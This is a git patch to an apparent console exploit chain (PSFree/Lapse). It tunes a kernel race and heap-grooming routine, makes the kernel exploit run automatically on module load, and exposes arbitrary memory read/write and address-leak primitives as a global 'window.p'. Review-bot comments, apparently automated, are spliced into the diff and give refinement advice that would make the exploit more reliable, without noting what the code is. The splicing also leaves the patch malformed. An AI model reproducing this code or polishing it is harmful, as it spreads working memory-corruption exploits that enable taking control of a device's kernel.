From 869e4ab9f08e206342d0961b83c70cf19d3f8f48 Mon Sep 17 00:00:00 2001
From: Kameleon <77245601+kmeps4@users.noreply.github.com>
Date: Sat, 17 May 2025 13:22:55 -0600
Subject: [PATCH] Set num_alias = 100 / Advise fom ABC
---
 lapse.mjs | 23 +++++++++-----------
 psfree.mjs | 63 ++++++++++++++++++++++++++++++++++++++++++++++++++++--
 2 files changed, 71 insertions(+), 15 deletions(-)
diff --git a/lapse.mjs b/lapse.mjs
index ff92a0c..ddd568f 100644
--- a/lapse.mjs
+++ b/lapse.mjs
@@ -133,7 +133,7 @@ const main_core = 7;
 const num_grooms = 0x200;
 const num_handles = 0x100;
 const num_sds = 0x100; // max is 0x100 due to max IPV6_TCLASS
-const num_alias = 10;
+const num_alias = 100;
 const num_races = 100;
 const leak_len = 16;
 const num_leaks = 5;
@@ -1640,18 +1640,7 @@ function setup(block_fd) {
 const greqs = make_reqs1(num_reqs);
 // allocate enough so that we start allocating from a newly created slab
 spray_aio(num_grooms, greqs.addr, num_reqs, groom_ids_p, false);
-cancel_aios(groom_ids_p, num_grooms);
-{
-// chosen to maximize the number of 0x100 malloc allocs per submission
-const num_reqs = 4;
-const groom_ids = new View4(num_grooms);
-const groom_ids_p = groom_ids.addr;
-const greqs = make_reqs1(num_reqs);
-// allocate enough so that we start allocating from a newly created slab
-spray_aio(num_grooms, greqs.addr, num_reqs, groom_ids_p, false);
-cancel_aios(groom_ids_p, num_grooms);
-}
-
+ cancel_aios(groom_ids_p, num_grooms);
 return [block_id, groom_ids];
 }
@@ -1667,6 +1656,7 @@ function setup(block_fd) {
 // // the exploit implementation also assumes that we are pinned to one core
 export async function kexploit() {
+ const _init_t1 = performance.now();
 await init();
 const _init_t2 = performance.now();
@@ -1743,5 +1733,12 @@ export async function kexploit() {
 for (const sd of sds) {
 close(sd);
 }
+ }
+ kexploit();
+
+
+
+
+
diff --git a/psfree.mjs b/psfree.mjs
index 2c5d03a..48d8aa4 100644
--- a/psfree.mjs
+++ b/psfree.mjs
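Review bot: The raised `num_alias` carries no comment recording why 100 was chosen, while the neighbouring `num_sds` line documents its bound inline; the only rationale is the commit title, which is lost once the file is read on its own. Suggest `const num_alias = 100; // raised from 10 on external advice (see commit 869e4ab)`. These constants sit at module level, outside any function, so nothing else in the hunk is affected.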
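Review bot: `kexploit();` at module level makes the exported function run as a side effect of loading lapse.mjs, and the returned promise is neither awaited nor given a rejection handler, so any failure inside it surfaces only as an unhandled rejection with nothing logged. Either leave the call to the importer (psfree.mjs already loads this module through `import('./lapse.mjs')`) or attach a handler, e.g. `kexploit().catch((e) => console.error(e));`. The five trailing blank `+` lines at the end of the hunk are noise and should be dropped. The added `}` closes a block that opens outside the hunk, so where `kexploit` now ends cannot be verified from here; its body starts outside the hunk.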
@@ -829,6 +829,64 @@ async function make_arw(reader, view2, pop) {
 );
 log('achieved arbitrary r/w');
+ window.p = {
+ read1(addr) {
+ addr = new Int(addr.low, addr.hi);
+ const res = mem.read8(addr);
+ return res;
+ },
+
+ read2(addr) {
+ addr = new Int(addr.low, addr.hi);
+ const res = mem.read16(addr);
+ return res;
+ },
+
+ read4(addr) {
+ addr = new Int(addr.low, addr.hi);
+ const res = mem.read32(addr);
+ return res;
+ },
+
+ read8(addr) {
+ addr = new Int(addr.low, addr.hi);
+ const res = mem.read64(addr);
+ return new int64(res.low, res.high);
+ },
+
+ write1(addr, value) {
+ addr = new Int(addr.low, addr.hi);
+ mem.write8(addr, value);
+ },
+
+ write2(addr, value) {
+ addr = new Int(addr.low, addr.hi);
+ mem.write16(addr, value);
+ },
+
+ write4(addr, value) {
+ addr = new Int(addr.low, addr.hi);
+ mem.write32(addr, value);
+ },
+
+ write8(addr, value) {
+ addr = new Int(addr.low, addr.hi);
+ if (value instanceof int64) {
+ value = new Int(value.low, value.hi);
+ mem.write64(addr, value);
+ } else {
+ mem.write64(addr, new Int(value));
+ }
+
+ },
+
+ leakval(obj) {
+ const res = mem.addrof(obj);
+ return new int64(res.low, res.high);
+ }
+ };
+
+ rdr.restore();
 // set the refcount to a high value so we don't free the memory, view's // death will already free it (a StringImpl is currently using the memory)
@@ -856,7 +914,8 @@ async function main() {
 await make_arw(rdr, view2, pop);
 clear_log();
- // path to your script that will use the exploit
- import('./lapse.mjs');
+
+ import('./lapse.mjs');
+
 }
 main();
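Review bot: `rdr.restore();` is added inside `make_arw`, whose parameter is named `reader`; unless `rdr` is a module-level binding (main() passes a variable of that name, so it may be) this throws a ReferenceError at the end of the function, and even if it resolves the code is reaching past its own argument, so use the parameter: `reader.restore();`. Each of the eight accessors begins with `addr = new Int(addr.low, addr.hi);`, reassigning a parameter and repeating the same conversion; a single `const toInt = (v) => new Int(v.low, v.hi);` beside the object literal would remove the duplication, and the empty line before `},` in `write8` should go. `window.p` also installs a mutable global with no comment; if the shape is kept for scripts that expect it, say so, e.g. `// read/write helpers exposed on window for scripts that expect this API`.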